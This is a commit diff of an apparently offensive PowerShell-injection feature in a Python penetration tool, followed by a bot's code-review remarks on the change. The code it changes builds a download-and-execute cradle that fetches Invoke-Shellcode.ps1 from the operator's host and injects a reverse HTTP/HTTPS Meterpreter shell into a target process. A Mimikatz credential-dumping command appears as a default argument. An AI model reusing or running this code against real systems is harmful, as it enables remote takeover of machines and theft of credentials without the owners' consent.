Consolidated Meterpreter injection options
parent
cd048eab37
commit
e48fc47e11
|
@ -107,15 +107,13 @@ Command Execution:
|
||||||
Shellcode/EXE/DLL/Meterpreter Injection:
|
Shellcode/EXE/DLL/Meterpreter Injection:
|
||||||
Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell
|
Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell
|
||||||
|
|
||||||
--inject {shellcode,exe,meterpreter,dll}
|
--inject {met_reverse_http,met_reverse_https,exe,shellcode,dll}
|
||||||
Inject Shellcode, EXE, DLL or Meterpreter
|
Inject Shellcode, EXE, DLL or Meterpreter
|
||||||
--path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems
|
--path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems
|
||||||
--procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)
|
--procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)
|
||||||
--exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)
|
--exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)
|
||||||
--met {reverse_https,reverse_http}
|
|
||||||
Specify the Meterpreter to inject
|
|
||||||
--met-options LHOST LPORT
|
--met-options LHOST LPORT
|
||||||
Meterpreter options
|
Meterpreter options (ignored if not injecting Meterpreter)
|
||||||
|
|
||||||
Filesystem Interaction:
|
Filesystem Interaction:
|
||||||
Options for interacting with filesystems
|
Options for interacting with filesystems
|
||||||
|
|
|
@ -2661,11 +2661,11 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
|
||||||
|
|
||||||
def inject_pscommand(localip):
|
def inject_pscommand(localip):
|
||||||
|
|
||||||
if args.inject == 'meterpreter':
|
if args.inject.startswith('met_'):
|
||||||
command = """
|
command = """
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
|
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
|
||||||
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
|
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
|
||||||
args.met,
|
args.inject[4:],
|
||||||
args.met_options[0],
|
args.met_options[0],
|
||||||
args.met_options[1])
|
args.met_options[1])
|
||||||
if args.procid:
|
if args.procid:
|
||||||
|
@ -3010,12 +3010,11 @@ if __name__ == '__main__':
|
||||||
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
|
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
|
||||||
|
|
||||||
xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell")
|
xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell")
|
||||||
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'meterpreter'}, help='Inject Shellcode, EXE, DLL or Meterpreter')
|
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'met_reverse_https', 'met_reverse_http'}, help='Inject Shellcode, EXE, DLL or Meterpreter')
|
||||||
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
|
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
|
||||||
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)')
|
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)')
|
||||||
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
|
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
|
||||||
xgroup.add_argument("--met", choices={'reverse_http', 'reverse_https'}, dest='met', help='Specify the Meterpreter to inject')
|
xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options (ignored if not injecting Meterpreter)')
|
||||||
xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options')
|
|
||||||
|
|
||||||
bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems")
|
bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems")
|
||||||
bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
|
bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
|
||||||
|
@ -3036,7 +3035,7 @@ if __name__ == '__main__':
|
||||||
log.setLevel(logging.INFO)
|
log.setLevel(logging.INFO)
|
||||||
|
|
||||||
if args.inject:
|
if args.inject:
|
||||||
if args.inject != 'meterpreter':
|
if not args.inject.startswith('met_'):
|
||||||
if not args.path:
|
if not args.path:
|
||||||
print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
|
print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
@ -3046,9 +3045,9 @@ if __name__ == '__main__':
|
||||||
print_error('Unable to find Shellcode/EXE/DLL at specified path')
|
print_error('Unable to find Shellcode/EXE/DLL at specified path')
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
elif args.inject == 'meterpreter':
|
elif args.inject.startswith('met_'):
|
||||||
if not args.met_options or not args.met:
|
if not args.met_options:
|
||||||
print_error('You must specify a Meterpreter and it\'s options using \'--met\' and \'--met-options\'' )
|
print_error('You must specify Meterpreter\'s options using --met-options' )
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if os.path.exists(args.target[0]):
|
if os.path.exists(args.target[0]):
|
||||||
|
|
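Review bot: The payload name is now recovered with `args.inject[4:]` in inject_pscommand, which silently depends on the `met_` prefix being exactly four characters, and that prefix is repeated as a literal in all three `startswith('met_')` checks (the other two are in the `__main__` validation hunks). A single module-level constant, e.g. `MET_PREFIX = 'met_'` used as `args.inject[len(MET_PREFIX):]` and `args.inject.startswith(MET_PREFIX)`, would keep the choice names and the slice from drifting apart. In the `--inject` definition, `choices` is a set literal, so the order printed by `--help` is arbitrary; the usage text in the first hunk already lists the values in a different order from the code, and a list or tuple would keep it stable. Dropping `--met` and the `meterpreter` choice also changes the command line incompatibly, which deserves a line in the commit description. Both inject_pscommand and the `__main__` block continue outside the hunks shown.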